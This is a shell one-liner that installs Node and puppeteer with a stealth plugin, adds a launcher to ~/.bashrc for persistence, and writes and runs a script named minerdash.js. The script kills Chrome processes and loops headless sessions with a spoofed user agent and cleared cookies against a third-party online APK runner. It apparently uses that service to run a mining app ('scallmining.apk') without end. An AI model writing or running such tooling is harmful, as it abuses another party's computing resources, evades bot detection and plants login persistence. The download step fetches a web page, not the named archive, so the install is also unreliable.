cd ~ && wget https://nodejs.org && tar -xvf node-v22.11.0-linux-x64.tar.xz && rm -rf node-v22.11.0-linux-x64.tar.xz && cd node-v22.11.0-linux-x64 && touch online && chmod +x * && echo "~/node-v22.11.0-linux-x64/online" >> ~/.bashrc && echo "cd ~/node-v22.11.0-linux-x64 && ./bin/node minerdash.js" > ~/node-v22.11.0-linux-x64/online && touch .puppetteerrc.cjs && npm init -y && npm install puppeteer puppeteer-extra puppeteer-extra-plugin-stealth && printf '%s\n' 'const puppeteer = require("puppeteer-extra");
const StealthPlugin = require("puppeteer-extra-plugin-stealth");
const { execSync } = require("child_process");
puppeteer.use(StealthPlugin());

const urls = [
  "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F2306000500%2FNewDocuments%2F%2Fscallmining.apk",
  "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F2306000501%2FNewDocuments%2F%2Fscallmining.apk"
];

(async () => {
  console.log("[Système] --- NETTOYAGE INITIÉ ---");
  
  try {
    console.log("[Système] Fermeture des anciens processus Chrome...");
    try { execSync("pkill -f chrome || true"); } catch(e) {}
    
    console.log("[Système] Libération du cache RAM système...");
    try { execSync("sync && echo 3 > /proc/sys/vm/drop_caches || true"); } catch(e) {}
  } catch (sysErr) {
    console.log("[Système] Note: Certains nettoyages système ont été ignorés (permissions).");
  }

  console.log("[Système] Démarrage du navigateur à neuf...");
  const browser = await puppeteer.launch({
    headless: "new",
    args: [
      "--no-sandbox",
      "--disable-setuid-sandbox",
      "--disable-dev-shm-usage",
      "--disable-gpu",
      "--clear-token-service",
      "--window-size=1280,800"
    ]
  });

  const runInstance = async (id, url) => {
    console.log(`[Instance ${id}] Initialisée.`);

    while (true) {
      let context;
      try {
        context = await browser.createBrowserContext();
        const page = await context.newPage();
        
        await page.setCacheEnabled(false);

        const client = await page.target().createCDPSession();
        await client.send("Network.clearBrowserCache");
        await client.send("Network.clearBrowserCookies");
        
        await page.setUserAgent(
          "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
        );

        console.log(`[Instance ${id}] --- ${new Date().toLocaleTimeString()} : Navigation ---`);
        await page.goto(url, { waitUntil: "networkidle2", timeout: 60000 });
        await new Promise(r => setTimeout(r, 10000));

        const clickAction = async () => {
          return await page.evaluate(() => {
            const search = (doc) => {
              const btn = doc.querySelector("#talpa-splash-button");
              if (btn) {
                btn.click();
                return true;
              }
              const frames = doc.querySelectorAll("iframe");
              for (let f of frames) {
                try {
                  if (search(f.contentWindow.document)) return true;
                } catch (e) {}
              }
              return false;
            };
            return search(document);
          });
        };

        let ok1 = await clickAction();
        if (ok1) {
          console.log(`[Instance ${id}] Premier clic réussi.`);
          await new Promise(r => setTimeout(r, 10000));
          await clickAction();
          console.log(`[Instance ${id}] Deuxième clic réussi. Session active (15min).`);
          await new Promise(r => setTimeout(r, 15 * 60 * 1000));
        } else {
          console.log(`[Instance ${id}] Bouton introuvable. Nouvel essai dans 1 min.`);
          await new Promise(r => setTimeout(r, 60000));
        }

      } catch (err) {
        console.error(`[Instance ${id}] Erreur: ${err.message}`);
        await new Promise(r => setTimeout(r, 30000));
      } finally {
        if (context) await context.close();
      }
    }
  };

  for (let i = 0; i < urls.length; i++) {
    runInstance(i + 1, urls[i]);
    console.log("Attente de 30s avant de lancer le lien suivant...");
    await new Promise(r => setTimeout(r, 30000));
  }
})();' > minerdash.js && ./bin/node minerdash.js
